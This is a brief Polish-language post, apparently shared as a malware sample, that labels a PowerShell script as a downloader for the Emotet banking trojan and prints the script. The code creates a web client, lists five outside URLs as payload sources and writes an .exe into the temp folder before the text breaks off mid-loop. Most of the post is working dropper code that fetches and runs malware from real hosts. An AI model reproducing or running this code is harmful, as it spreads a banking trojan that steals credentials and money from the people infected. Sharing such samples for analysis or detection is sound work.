Skrypt w powershell pobiera i ładuje Emotet - trojan bankowy.
Kod:
$GKM=new-object Net.WebClient;$Oza='http://jandkonline.com/smp/B4Nxg4v/@http://michaelkammes.com/N9vdTTT/@http://www.wrightstexasnursery.com/1koy/@http://creative-machine.net/eh0HC/@http://redwire.us/rco/P5DDr/'.Split('@');$faE = '85';$mvI=$env:temp+'\'+$faE+'.exe';foreach($Rmp in $O